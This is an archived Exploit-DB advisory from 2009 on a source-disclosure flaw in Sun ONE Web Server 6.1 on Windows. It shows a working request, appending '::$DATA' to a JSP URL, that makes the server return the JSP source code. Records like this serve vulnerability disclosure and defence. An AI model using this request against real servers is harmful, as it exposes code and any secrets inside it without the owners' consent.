Sun One WebServer 6.1 JSP Source Viewing Vulnerability



EDB-ID: 9096 CVE: N/A OSVDB-ID: N/A
Author: kingcope Published: 2009-07-09 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
Sun One WebServer 6.1 JSP Source Viewing vulnerability

System: Sun-ONE-Web-Server/6.1, Windows Server 2003

SunOne WebServer (formerly Netscape Enterprise Server, iPlanet) on Windows Systems lets remote people disclose
JSP Source code.

A normal URL would look like:

http://server/hello.jsp

To disclose the contents including source code of a JSP file:

http://server/hello.jsp::$DATA

Best Regards,

Nikolaos Rangos

# milw0rm.com [2009-07-09]